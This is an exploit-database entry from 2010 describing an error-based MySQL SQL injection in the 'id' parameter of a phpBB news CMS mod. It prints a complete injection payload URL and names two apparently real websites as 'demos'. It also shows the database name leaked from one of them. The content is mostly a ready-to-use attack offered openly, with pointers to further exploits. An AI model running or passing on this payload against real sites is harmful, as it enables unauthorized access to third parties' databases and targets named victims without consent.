phpBB Modified by (News CMS) <= Remote Based SQL Injection

2010-11-11T00:00:00
ID 1337DAY-ID-14791
Type zdt
Reporter KnocKout
Modified 2010-11-11T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ==========================================================
phpBB Modified by (News CMS) <= Remote Based SQL Injection
==========================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm KnocKout member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : [email protected]
[~] HomePage : http://h4x0resec.blogspot.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : phpBB MOD by (news CMS)
|~Price : N/A
|~Version : N/A
|~Software: www.phpbb.com
|~Vulnerability Style : SQL Injection
|~Vulnerability Dir : /news/
|~sqL : MySQL error based
|~Google Keyword : N/A
|[~]Tested on : (L):Vista (R):Apache/2.2.9 (Debian) PHP/5.2.6-1 and Demos
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Demos: 
http://www.travelguide-bg.com/news/
http://www.eaglesflyinghigh.com/news/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ===============================================================
    |{~~~~~~~~ Explotation| MySQL error based SQL Injection~~~~~~~~~~~}|
    
    http://$Site/$path//news/news.php?id= {SQL Injection}
    
    Ex; http://www.travelguide-bg.com
    
    [~] SQL Injecting
    http://www.travelguide-bg.com/news/news.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
    [~] MSSQL Error : Duplicate entry '~'EFH_Production'~1' for key 1
    [+] DB Name : 'EFH_Production' [OK]
    
    To your Continue..
    
    http://milw0rm.ws/exploits/14509
    
     .. 
    =============================================================



#  0day.today [2018-01-05]  #